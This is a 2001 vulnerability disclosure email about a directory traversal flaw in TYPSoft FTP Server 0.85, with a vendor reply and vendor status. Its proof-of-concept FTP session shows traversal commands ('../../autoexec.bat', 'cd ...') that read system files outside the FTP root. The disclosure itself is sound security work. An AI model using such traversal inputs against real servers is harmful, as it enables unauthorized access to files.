Date: Wed, 28 Feb 2001 18:27:57 -0500
From: [email protected]
To: [email protected]Subject: Vulnerability in TYPSoft FTP Server
--Hushpart_boundary_FadiaqzpWNVmzkSnDXHMQfQScbGcuONv
Content-type: text/plain
----- Begin Hush Signed Message from [email protected] -----
Vulnerability in TYPSoft FTP Server
Overview
TYPSoft FTP Server v0.85 is an ftp server available from
http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
exists which allows a remote attacker to break out of the ftp root using
relative paths (ie: '...').
Details
The following is an illustration of the problem:
% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>
Solution
> Date: Sat, 24 Feb 2001 01:39:23 -0500
> Subject: Re: Vulnerability in TYPSoft FTP Server
> From: TYPSoft <[email protected]>
> To: [email protected]
>
> Hi
> I have try to fix this problem.
> I test I have made seem to be OK.
> Thanks for the report
>
> Marc
> TYPSoft
Unfortunately, I do not have the resources to verify this fix at
this time. Thus, I urge users to proceed with caution.
Vendor Status
TYPSoft was contacted via <[email protected]> on Wednesday, February
21, 2001.
- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )
----- Begin Hush Signature v1.3 -----
CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_FadiaqzpWNVmzkSnDXHMQfQScbGcuONv--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
